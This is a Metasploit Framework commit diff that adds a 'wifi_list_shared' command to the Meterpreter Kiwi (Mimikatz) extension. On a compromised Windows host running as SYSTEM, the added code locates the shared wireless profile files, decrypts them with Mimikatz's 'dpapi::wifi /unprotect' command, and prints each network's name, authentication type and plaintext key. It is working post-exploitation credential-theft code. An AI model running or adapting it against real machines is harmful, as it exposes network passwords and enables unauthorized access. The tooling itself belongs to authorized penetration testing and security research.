Land rapid7#8225, Expose the shared wifi profile dumping feature in Mimikatz

Brent Cook · Brent Cook · commit 6f763a616daa · 2017-04-25T11:23:34.000-05:00
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
@@ -379,6 +379,57 @@ def golden_ticket_create(opts={})
     content.join('')
   end
 
+  #
+  # Access and parse a set of wifi profiles using the given interfaces
+  # list, which contains the list of profile xml files on the target.
+  #
+  # @return [Hash]
+  def wifi_parse_shared(wifi_interfaces)
+    results = []
+
+    exec_cmd('"base64 /in:off /out:on"')
+    wifi_interfaces.keys.each do |key|
+      interface = {
+        :guid     => key,
+        :desc     => nil,
+        :state    => nil,
+        :profiles => []
+      }
+
+      wifi_interfaces[key].each do |wifi_profile_path|
+        cmd = "\"dpapi::wifi /in:#{wifi_profile_path} /unprotect\""
+        output = exec_cmd(cmd)
+
+        lines = output.lines
+
+        profile = {
+          :name        => nil,
+          :auth        => nil,
+          :key_type    => nil,
+          :shared_key  => nil
+        }
+
+        while lines.length > 0 do
+          line = lines.shift.strip
+          if line =~ /^\* SSID name\s*: (.*)$/
+            profile[:name] = $1
+          elsif line =~ /^\* Authentication\s*: (.*)$/
+            profile[:auth] = $1
+          elsif line =~ /^\* Key Material\s*: (.*)$/
+            profile[:shared_key] = $1
+          end
+        end
+
+        interface[:profiles] << profile
+      end
+
+      results << interface
+    end
+    exec_cmd('"base64 /in:on /out:on"')
+
+    results
+  end
+
   #
   # List all the wifi interfaces and the profiles associated
   # with them. Also show the raw text passwords for each.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -72,7 +72,8 @@ def commands
       'kerberos_ticket_list'  => 'List all kerberos tickets (unparsed)',
       'lsa_dump_secrets'      => 'Dump LSA secrets (unparsed)',
       'lsa_dump_sam'          => 'Dump LSA SAM (unparsed)',
-      'wifi_list'             => 'List wifi profiles/creds',
+      'wifi_list'             => 'List wifi profiles/creds for the current user',
+      'wifi_list_shared'      => 'List shared wifi profiles/creds (requires SYSTEM)',
     }
   end
 
@@ -303,37 +304,50 @@ def cmd_kerberos_ticket_use(*args)
   end
 
   #
-  # Dump all the wifi profiles/credentials
+  # Dump all the shared wifi profiles/credentials
   #
-  def cmd_wifi_list(*args)
-    results = client.kiwi.wifi_list
+  def cmd_wifi_list_shared(*args)
+    interfaces_dir = '%AllUsersProfile%\Microsoft\Wlansvc\Profiles\Interfaces'
+    interfaces_dir = client.fs.file.expand_path(interfaces_dir)
+    files = client.fs.file.search(interfaces_dir, '*.xml', true)
 
-    if results.length > 0
-      results.each do |r|
-        table = Rex::Text::Table.new(
-          'Header'    => "#{r[:desc]} - #{r[:guid]}",
-          'Indent'    => 0,
-          'SortIndex' => 0,
-          'Columns'   => [
-            'Name', 'Auth', 'Type', 'Shared Key'
-          ]
-        )
+    if files.length == 0
+      print_error('No shared WiFi profiles found.')
+    else
+      interfaces = {}
+      files.each do |f|
+        interface_guid = f['path'].split("\\")[-1]
+        full_path = "#{f['path']}\\#{f['name']}"
 
-        print_line
-        r[:profiles].each do |p|
-          table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
-        end
+        interfaces[interface_guid] ||= []
+        interfaces[interface_guid] << full_path
+      end
+      results = client.kiwi.wifi_parse_shared(interfaces)
 
-        print_line(table.to_s)
-        print_line("State: #{r[:state]}")
+      if results.length > 0
+        display_wifi_profiles(results)
+      else
+        print_line
+        print_error('No shared wireless profiles found on the target.')
       end
+    end
+
+    true
+  end
+
+  #
+  # Dump all the wifi profiles/credentials for the current user
+  #
+  def cmd_wifi_list(*args)
+    results = client.kiwi.wifi_list
+    if results.length > 0
+      display_wifi_profiles(results)
     else
       print_line
       print_error('No wireless profiles found on the target.')
     end
 
-    print_line
-    return true
+    true
   end
 
   @@creds_opts = Rex::Parser::Arguments.new(
@@ -401,6 +415,30 @@ def cmd_creds_kerberos(*args)
 
 protected
 
+  def display_wifi_profiles(profiles)
+    profiles.each do |r|
+      header = r[:guid]
+      header = "#{r[:desc]} - #{header}" if r[:desc]
+      table = Rex::Text::Table.new(
+        'Header'    => header,
+        'Indent'    => 0,
+        'SortIndex' => 0,
+        'Columns'   => [
+          'Name', 'Auth', 'Type', 'Shared Key'
+        ]
+      )
+
+      print_line
+      r[:profiles].each do |p|
+        table << [p[:name], p[:auth], p[:key_type] || 'Unknown', p[:shared_key]]
+      end
+
+      print_line(table.to_s)
+      print_line("State: #{r[:state] || 'Unknown'}")
+    end
+  end
+
+
   def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
     if client.sys.config.is_system?
       print_warning(msg)
